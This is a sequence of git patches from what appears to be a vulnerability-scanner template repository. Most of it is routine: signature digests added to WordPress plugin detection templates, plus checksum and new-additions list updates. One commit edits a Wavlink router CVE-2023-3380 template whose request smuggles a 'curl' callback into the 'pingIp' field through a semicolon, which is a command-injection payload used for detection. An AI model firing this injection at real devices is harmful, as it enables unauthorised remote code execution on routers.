b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..d88f11373c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0cd91aa946236bb7ef560b14a53209ccc7e9bb343a7a21d2454f631ac4f6c0302205a50fea784befae30e14ef473bc9318c312d2bab227ecfcf10679c3f45d9bca8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..755ffb7d40 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210099ae5969d74ecc06c100c0fe9acfdefad3f3b810ca772743c7f1403fe66be608022100fcdacfe5e539ae0a08011643ca41f9c517dd7cfb13fd52db8491435732668d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..2e23accd62 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f206460803bcb38c9dd423880add2a223880e6f33e84202b6b7ed3e1d00c7977022100dbad63702b4f2476c6e5f52a6dd15458e0085771eb54bc0b1112424b424c1b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..8ad50d77f0 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d8059dafe563f137b7f96dfa60fc0d3fd1989ecca49364cbd55fac2868c5a2b02205c3e862c38d73186de15f43d933748b1564fba00f3c166df1a0fd04526fca79d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..54844ccc5d 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207dde9d2563112aa4a5e3fe34b59e1733e47842910ccf4eda6b2055e66cf1aaec0220655ad576c2a4455272fd413df1267ed8e3465eabb817db2cd4d5e90f3925abb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..abebdeee04 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e1cf883da953bd3fd08bb45190d73c9158d692600a654b8491244ee068dfc8200220783d25b4bd4b03417a19f8f18fc2a25f25acbf5d223b09e616350ef3734a37d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..9e54de5e1b 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022024fbc45a6a71b66ce9faac0b44cab3a2fba4418489df515c3613e95292fb904a022100d5156e8ab636e9bff2dcbefae5236213105353a58493453b1d8d0be696c0a109:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..6635a9df5b 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac0f6d97dd86b0e82477090f0706b6083801664a4fbc5eb123b1326cd7a4be51022100c285453e8621c5549b84012535ebcb756242f0e74ec16a1dc408188dd9f6b12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..5636b82b2d 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009b5fc2579c4621b83f797cbf8567fda4b81876373c3fbeb659e49c5a5e292e82022100e258938805da48cd9f835d47a6c0e88f785d05f5afe14ea8c198186a27944e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..764720b922 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220237d675746bd9b30adeff5d2c2b3d11032a36536ce4bbef5ddde661bc724a905022100eb3d3db440f241e90dc749c189ed47be3a637a0fd6652af94f4b9a1c883026fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..a194c53570 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c48846a9d66c7bf63327f7bc5de91cad0cb257b746a6c850f206017bc2645983022079e8b2d00ab644e71d79fb1a13d6e09071d782345904aed6f0c4a49613c93d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..e0b7039079 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b3e88517cfba6fc0ffaab0b554a3f0d2189be8fa14eae0e889e140d70f1441f10221008efabce2f344ddcfa7316cb4dddf9929a7597751d3add6f6df5af0d3a0c144a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..c7608e841f 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009acfffe644541f0a1e334f489ff4609b2a39579fe7bba2123a604d8d840ce2e70220474437a6851069b3c3fa09e19475cd6afc5604980ff77b75c04f1b98e2f42fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..ebf3f40686 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d8d7dcee3e7c73354f9e70d1d3232dd6e024cdb580cadb1fdc3fea92f528634022100b76ca44505af6d4eb7d3397d1fdd9aa58162684109fa44f51af2ef5dc037416f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..528228b4f1 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae5cb696e48318cb133af2c8367cf4935354179990933f06aa48c4f3200c1b8002207890dfc544f36b9099607406ab79f3296deae3605e799545e6bea3f95ab25a1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..303cc3ab4e 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100be6b8ffb76306f08243e5add5efb7f8c9622ba871a8bd70d5e7d154dae3de4fd0220191e5c24c38266492af683976728858b00e5ff9812629cc1cee6b2c7b6176c26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..b2d19d00d7 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079cf1f611d3c6fb515663035980bcebc7bae4aef3b3eef51635162a54ffa6a09022100b0868081317bb1ea5ea3fe00f0767f8afb3719c1cd4028eb06cff09dbf1ca381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..28e58b5227 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8a404d10fb5c757173e3c832bf9fc48aca0b73d5beac8eaac157f58ed262b97022100a5ccf1342f9cb00d802bfa5cee29e16626d30e97a4d4493bee99f5b6a24ae744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..59e139eb08 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210091ac599d6702f2efd8e1e4fd4d4359cf8e80f6c48997ce9e2f9d0f67af0c9bf9022100bd3818bd2379865d1b7a16a92e4ca1e3ef9f857e32d93ce790e7f3535ae0c38b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..6f8a1dec19 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008ea9135bf615cbbbedc53bc34024b5455f7f9bc6ff4e99f6cf89b1a776a283aa02202c90bde177e48c15c2b157810f2605d13c340a53e6c0537a474409e1979be09c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..39c1d31a08 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022016ce18a1a12d46ef0a48389245764f15daa3723491673b9609044d96f1e94a7a022100e48815bc4e9e8a8a844b0d0ee7746240c8d2c4008d138021864b88f703356f91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..6c3a68c37b 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e10dca494ac96ff524128df3fb8742f171c7ca9df000b611313bbb1cae71a0fe02205380ef938c355bb35b80789b09cbc705558eee4d43d269508a8d6ba0c9f524fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..80928bb47b 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b1b9c1f0b311d151901f242bab8674e44f3814466b2f487a7ebb44596cf4bc2022100a7222351d453bbd33e0d71a3dba4db1c109a6b0a477feb44b6b294a65647d38b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..18a6327308 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201bcfe0b014b20bbc525b65cb62d45cabdd2688d240b83d1b41865f0931ed229d02203094f6449118cae42ae5ec16b856c45f7c5300b3d8e47a4b7fd83e61a2c6e098:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..3898774ebe 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082a925edc88bd214177afe59b0557b18e7b04855df0eb24e3b851c2dbc9e361e02203cc96a7f1179fcb04e4d51ad8b290e8aabf3538b55fbe9478467c2cc8f12d987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..a6bbf38542 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008fed0292baefa9b603c88983f2613e945908a565f756914e5aa4960fb131efc102204bd6734ab937261a6f4a481e36e8a0b1840bc01019df7132ac7b9496dd4dfbd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..479c4db135 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d8cc89b8c0121b66f21690d2281cd1fec2cb14c7dc6c8e34641be0871f2e32e90220240f6edfe89a2834474f34b17c41dfbb796c80ffd0e943241e172892100a064d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 58e5e828bf..b0b84c82b8 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0fb451bf826a4c32656ef610562ba8a0ffe77bd491b3d4f832feeda9de532c002200828be76037169b53b79368e4ea62420aec283980d0063f65a4fdac961bc1b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..78aae84166 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100af3f0a3f9551d81e6934fb0d8a5fc727d087d9ba242b0de9df90269be8d12f6902205f76b64a33c6a51e1f29e4d5b43fead1d78effdf547dca791d15f3b0e4ad24a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..73333ed0e1 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c167c26edf964fe4ef59a96285b4e7128135c0401d4484dd8788ed052bda70bf022051a44b1ee69fe5056a17c26d149ea4abadb6490421da9556ae2066b6058edbf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..80d43ef8e3 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4b5ab6e095fd132c4b1251d90fc33cdfc9f31f5a58009182e2c024f3930f0530221009e66b90a931007a2fe77d5b516aa73adb031ce2f555560121ddfc754d67813fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 73694e1f11528440913e7351cdd76b9899390ca5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Jul 2024 16:03:07 +0530 Subject: [PATCH 0820/1841] Update CVE-2023-3380.yaml --- http/cves/2023/CVE-2023-3380.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml index b0d6fbb189..506f1a8eb0 100644 --- a/http/cves/2023/CVE-2023-3380.yaml +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -22,7 +22,7 @@ info: vendor: wavlink product: wn579x3_firmware shodan-query: http.html:"Wavlink" - tags: cve,cve2023,wavlink + tags: cve,cve2023,wavlink,rce flow: http(1) && http(2) @@ -45,7 +45,7 @@ http: Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/ping.shtml?r=32723 + Referer: {{RootURL}}/ping.shtml page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}} From 1bf464b7836d87f7c0573dc2976267a357fa5c3b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 3 Jul 2024 10:36:35 +0000 Subject: [PATCH 0821/1841] Auto Generated New Template Addition List [Wed Jul 3 10:36:35 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 399476ef7b..19e02e9967 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,5 @@ +dast/vulnerabilities/xinclude-injection.yaml +http/cves/2023/CVE-2023-3380.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-27292.yaml From 4b64b5d13ccace2e437b23cb1c54561f578addec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 10:36:42 +0000 Subject: [PATCH 0822/1841] Auto Generated Templates Checksum [Wed Jul 3 10:36:42 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b775e26d5c..6e0672ff97 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3157,6 +3157,7 @@ http/cves/2023/CVE-2023-33510.yaml:6db13769fa328f1cf80d6f5fb6adcdc9b8f1f53a http/cves/2023/CVE-2023-33568.yaml:785724178bb0f9cbb97d985c085d3d038efa75e9 http/cves/2023/CVE-2023-33629.yaml:50b5034e3cc19561694c3aa213d4c0d53013b6cf http/cves/2023/CVE-2023-3368.yaml:a8ff1548e219ee4de8587c1b1f37207efcdbb22d +http/cves/2023/CVE-2023-3380.yaml:82e29c1bd9589c15a6a70e8d244465c65ef39a7c http/cves/2023/CVE-2023-33831.yaml:e6d20c47f0fdd4c0d5fdfc162920edfa3a997ff4 http/cves/2023/CVE-2023-34020.yaml:8099d3e12f8a10e2d96d8bd1dc9161f04f821fb1 http/cves/2023/CVE-2023-34124.yaml:73042d74ae02e14a69bbc74952d41b3dc4aacc5e @@ -3574,7 +3575,7 @@ http/default-logins/leostream/leostream-default-login.yaml:b478948b507e476bd490b http/default-logins/lucee/lucee-default-login.yaml:1f77fa884b48e3e147c00290ceedb09037d1ba49 http/default-logins/lutron/lutron-default-login.yaml:03cca82eae76164ef0f6576423f6a1499eb7a1a3 http/default-logins/magnolia-default-login.yaml:f1d27055c0c45da07e214e7cb2b677fe2808c919 -http/default-logins/mantisbt/mantisbt-anonymous-login.yaml:d70bf1c77e73b5eeee82b4b8491b04e3f9522df1 +http/default-logins/mantisbt/mantisbt-anonymous-login.yaml:a6f465f5a432a615637b874e0009bf45807b71d6 http/default-logins/mantisbt/mantisbt-default-credential.yaml:30f4e0ea9fb36172667235072e61ef734891ac9a http/default-logins/minio/minio-default-login.yaml:f832e9adbba186536407af73fbba5e55b73cf0d8 http/default-logins/mobotix/mobotix-default-login.yaml:e1ae410268e501412f31b614dc1f1194bb22f318 @@ -7238,228 +7239,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:5eb874b61c4ed2fa9ebafd85796eb286d71292b5 +http/technologies/wordpress/plugins/add-to-any.yaml:852e47b8eebe5ae7614628c3eac3bfcb8d865d4d +http/technologies/wordpress/plugins/admin-menu-editor.yaml:a148525c3ff0ea1d9510dffcb5dd25857bd22771 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:bfc2dc1405c48b9b7ea57612a52bf3fd3c69c0b7 +http/technologies/wordpress/plugins/akismet.yaml:4a3487a67472d564be5f7531e1e84c4d1e2c88dc http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:3637d13dd493a507f5dd5f256cb6691a1d048137 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:1eecb64ba63d9b703dfc8edf26ae7064cdb96122 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:7bb3cf358c4a65e84a699ab16260cd7a2c0242f8 +http/technologies/wordpress/plugins/amp.yaml:90ae87260a7a3839c35b5f64f5b40f1b86773b03 +http/technologies/wordpress/plugins/antispam-bee.yaml:28e201503e631f3f9876b9808261104adeede9aa +http/technologies/wordpress/plugins/astra-sites.yaml:c1cf088b1b6d4944c52b19f78493f1a680860211 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:18d50c381fa532bafac34833a4cf4e485a2a2cef +http/technologies/wordpress/plugins/backwpup.yaml:840a30f5fed6eeb1bf3323ba062105482756fbae +http/technologies/wordpress/plugins/better-search-replace.yaml:629f806e274deed1863e1057194c659df801c927 +http/technologies/wordpress/plugins/better-wp-security.yaml:5c8adf0cd0de7e8aad5768d105a57c224ffd2050 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:ff60e8d0b7099bf56d70fe385776f0228bf303a4 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:5f6b5a465f4de9218fd0c4ea06413400e0e5d590 +http/technologies/wordpress/plugins/breeze.yaml:5a4c20f29292e03babfcb679da958490f4d3c28d +http/technologies/wordpress/plugins/broken-link-checker.yaml:a1c198ebafb0406ffc05fc508fddf09a3d89edc6 +http/technologies/wordpress/plugins/chaty.yaml:b6e4953d5711c2ab1b438e1d5c5e2702f9d6d881 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:fc360b0d349c29a93d537ac94ca5edaafe462d91 +http/technologies/wordpress/plugins/classic-editor.yaml:82db8b1d705cfa28c02fb84c5c514b6b43829043 +http/technologies/wordpress/plugins/classic-widgets.yaml:88f9d63b14aae7b60581ff2df8f1be791688cd58 